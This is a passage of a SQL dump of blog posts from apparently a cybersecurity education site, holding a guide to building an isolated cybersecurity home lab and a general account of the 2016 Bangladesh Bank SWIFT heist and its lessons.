vulnerabilities, such as <b><strong class=\"font-bold\">Metasploitable</strong></b>, <b><strong class=\"font-bold\">DVWA (Damn Vulnerable Web Application)</strong></b>, or <b><strong class=\"font-bold\">OWASP Broken Web Applications</strong></b>.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Router</strong></b>: A device to manage traffic and securely connect different networks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Firewall</strong></b>: A software or hardware solution that controls traffic between networks, improving security.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Monitoring Tools (Optional)</strong></b>: Tools like <b><strong class=\"font-bold\">Splunk</strong></b> or <b><strong class=\"font-bold\">ELK Stack</strong></b> for tracking and analyzing network activity in real time.</li>\r\n</ol>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Setting Up Your Network Environment</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Your home lab should consist of three main components:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Isolated Network</strong></b>: Contains the vulnerable devices and attack device. This network won\'t affect your personal or home devices.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Home Network</strong></b>: Includes laptops, mobile devices, or other everyday internet-enabled hardware.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Firewall and Router</strong></b>: Acts as a gateway between the isolated network, home network, and the internet, ensuring proper configuration and safety.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Network Diagram Overview</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To ensure optimal understanding and setup, use a network diagram as a visual guideline. A basic layout should include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">An isolated network for vulnerable devices and testing.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">A home network for personal use.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">A firewall/router connecting the two to the internet securely.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step-by-Step Guide to Setting Up a Cybersecurity Home Lab</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 1: Setting Up the Isolated Network</h3>\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Hardware:</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use a physical router or create a virtual network using software like <b><strong class=\"font-bold\">VMware</strong></b> or <b><strong class=\"font-bold\">VirtualBox</strong></b>. Virtual networks provide flexibility and cost-efficiency by allowing you to create multiple isolated environments within a single machine.</li>\r\n</ul>\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Attack Device:</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Install <b><strong class=\"font-bold\">Kali Linux</strong></b> on your attack device. This open-source platform includes hundreds of tools specifically designed for penetration testing and digital forensics.</li>\r\n</ul>\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Vulnerable Devices:</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Deploy virtual machines (VMs) with deliberately insecure systems. Popular options include:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Metasploitable</strong></b>: Mimics real-world vulnerabilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">DVWA</strong></b> (Damn Vulnerable Web Application): A web-based platform for testing security skills.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">OWASP Broken Web Applications</strong></b>: A collection of vulnerable web apps.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 2: Configuring the Router and Firewall</h3>\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Router:</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Ensure your router supports multiple networks using <b><strong class=\"font-bold\">VLANs (Virtual Local Area Networks)</strong></b> or use multiple routers. VLANs allow segmentation of network traffic, boosting security and performance.</li>\r\n</ul>\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Firewall:</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Place the firewall between your router and the internet. Use hardware-based options or software firewalls like <b><strong class=\"font-bold\">pfSense</strong></b>. Configure it to allow traffic from both your home and isolated network while blocking unnecessary connections.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 3: Connecting the Home Network</h3>\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Home Devices:</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Connect personal devices (e.g., laptops, smartphones) to the home network. Ensure they remain entirely segregated from the isolated environment.</li>\r\n</ul>\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Separation:</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Maintain separation between the two networks through VLANs, separate routers, or other segmentation tools. This protects your personal devices from vulnerabilities in your isolated network.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Practical Exercises for Cybersecurity Training</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Once your lab is operational, you can perform several exercises to develop your skills further:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Penetration Testing</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Using tools like <b><strong class=\"font-bold\">Metasploit</strong></b>, <b><strong class=\"font-bold\">Nmap</strong></b>, and <b><strong class=\"font-bold\">Wireshark</strong></b>, explore the vulnerabilities in your isolated network. Practice identifying weaknesses and simulating exploitation scenarios.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Vulnerability Assessment</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Run scans with tools like <b><strong class=\"font-bold\">OpenVAS</strong></b> or <b><strong class=\"font-bold\">Nessus</strong></b> to generate detailed reports on vulnerabilities. Learn about potential risks and mitigation strategies to strengthen defenses.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Firewall Configuration</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Play around with firewall rules using tools like <b><strong class=\"font-bold\">pfSense</strong></b>. Simulate attacks to see how your firewall responds and fine-tune settings for enhanced security.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Advanced Scenarios (Optional)</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Simulate Real-World Attacks</strong></b>: Recreate phishing attacks, SQL injection, or cross-site scripting (XSS) to understand both offensive and defensive approaches.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Mitigate Vulnerabilities</strong></b>: After identifying risks, practice implementing countermeasures such as patches or improved configurations.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Monitoring and Logging</strong></b>: Set up logging solutions like <b><strong class=\"font-bold\">Splunk</strong></b> or <b><strong class=\"font-bold\">ELK Stack</strong></b> to detect and respond to unusual activity in real time.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Tips for Ethical Hacking</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While practicing, it\'s crucial to adhere to ethical standards:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Only experiment in environments where you have permission.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Never use your skills on live systems or networks without explicit authorization.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Regularly update and patch the software in your home lab to avoid leaving it vulnerable.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Thoughts</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A cybersecurity home lab is an invaluable resource for anyone aspiring to master cybersecurity. By simulating real-world scenarios in a controlled environment, you\'ll sharpen your skills, boost your confidence, and prepare to tackle professional challenges.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Want to take your lab to the next level? Start experimenting with advanced features like security monitoring, penetration testing frameworks, and even developing your own attack scripts. With time and consistent effort, your home lab could become the stepping stone to an exciting and rewarding career in cybersecurity.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Now that you\'ve learned how to set up your home lab, it’s time to get started! Remember, practice makes perfect—and there\'s no better way to hone your skills than by experimenting in your own secure environment. Happy hacking!</p>', '', NULL, NULL, 1, 'draft', '2024-08-01 02:46:15', '2026-01-12 21:41:44', 'Network Security', 'How to Set Up a Cybersecurity Home Lab', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(127, 'The Bangladesh Bank Heist: How Cybercriminals Exposed Vulnerabilities in Global Banking', 'the-bangladesh-bank-heist-how-cybercriminals-exposed-vulnerabilities-in-global-banking', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">In February 2016, the world was gripped by one of the most daring and sophisticated digital heists in history. Cybercriminals targeted the Bangladesh Bank and attempted to steal $1 billion. This incident shook the global financial system and highlighted the pressing need for stronger cybersecurity measures in banking. Let\'s take a closer look at this landmark cybercrime, how it unfolded, and the key lessons it taught the financial world.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How the Hackers Exploited the SWIFT Network</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">At the heart of this heist was the SWIFT (Society for Worldwide Interbank Financial Telecommunication) network, a critical messaging system used globally by financial institutions to securely transmit transaction instructions. The attackers exploited vulnerabilities within this system to carry out their plan.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step-by-Step Breakdown of the Attack</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The Bangladesh Bank heist was a textbook example of meticulous planning and execution. Here’s how it all played out:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Network Infiltration</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The attackers likely used a combination of social engineering tactics and malware to gain unauthorized access to Bangladesh Bank’s internal networks.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Stealing SWIFT Credentials</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Once inside the network, the hackers obtained SWIFT credentials, allowing them to initiate transactions that appeared completely legitimate.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Timing the Heist</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The attack was strategically timed to occur over a weekend when the bank was closed. This minimized the risk of immediate detection.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"4\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Bypassing Verification Protocols</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The criminals exploited weaknesses in the SWIFT network\'s security protocols, bypassing standard verification measures to initiate fraudulent transactions.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Their ultimate goal? To siphon off $1 billion. However, the full scale of their plan was not realized, thanks to an unexpected disruption.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Irony in Prevention: The Role of a Printer Error</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A technical glitch became one of the most unexpected heroes of this heist. A simple printer error prevented transaction records from being printed automatically. When employees returned to work on Monday and noticed this irregularity, suspicions were raised.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The bank swiftly investigated the matter and discovered the fraudulent transactions, enabling them to halt additional transfers. Although $81 million still made its way into the hands of the attackers, the prompt response helped reduce the scale of the damages.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What Happened After the Heist?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The Bangladesh Bank heist was nothing short of a wake-up call for the global financial industry. It exposed glaring vulnerabilities in systems designed to secure the movement of trillions of dollars every day. Here’s how SWIFT responded:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Security Enhancements Implemented by SWIFT</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Customer Security Controls Framework (CSCF):</strong></b> SWIFT introduced a comprehensive framework of mandatory and advisory security controls to be adopted by all users.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Enhanced Authentication:</strong></b> Stricter measures were implemented to verify the legitimacy of financial transactions.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Improved Monitoring Systems:</strong></b> Systems were upgraded to better detect and flag suspicious activities in real time.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Threat Intelligence Sharing:</strong></b> A framework for sharing threat intelligence among SWIFT users was established, fostering a collective defense against cyber threats.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">These efforts have significantly improved the security of the SWIFT network, but they also serve as a reminder that cybersecurity is an ongoing battle.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Lessons Learned from the Bangladesh Bank Heist</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The heist offered valuable lessons for banks and financial institutions around the globe. It underscored the critical importance of adopting robust, proactive cybersecurity measures. Here are some key takeaways:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Continuous Monitoring</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Financial institutions should adopt 24/7 surveillance of their network activities. Real-time monitoring helps detect and mitigate threats before they cause significant damage.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Regular Security Audits</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Frequent assessments help identify potential vulnerabilities in a system. Fixing these weaknesses before they are exploited is essential for staying ahead of cybercriminals.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Employee Training</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Social engineering is a favorite tactic for hackers. Regular training sessions for staff can significantly reduce the chances of falling victim to phishing or other manipulative techniques.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"4\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Incident Response Planning</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A robust incident response plan is critical. When a breach occurs, having a clear action plan ensures swift containment of the damage and minimizes financial loss.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Thoughts on the Global Impact of the Bangladesh Bank Heist</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The Bangladesh Bank heist wasn’t just a financial crime—it became a pivotal moment in the history of cybersecurity. While the attackers managed to steal $81 million, the incident was a catalyst for change, prompting financial institutions worldwide to reevaluate and strengthen their cybersecurity measures.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With cyber threats continuing to evolve, the financial sector must remain vigilant. By adopting layered security systems, leveraging advanced monitoring tools, and fostering industry-wide collaboration, institutions can stay ahead of the curve and protect their assets.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If the Bangladesh Bank heist reminds us of one thing, it’s this: cybersecurity isn’t just a best practice—it’s a critical necessity in today’s interconnected financial landscape.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By learning from the events of February 2016, banks and financial institutions can fortify their defenses and ensure that such large-scale breaches remain a thing of the past</p>', '', NULL, NULL, 1, 'draft', '2024-08-01 02:44:33', '2026-01-12 21:41:44', 'History', 'The Bangladesh Bank Heist: How Cybercriminals Exposed Vulnerabilities in Global Banking', '', NULL),
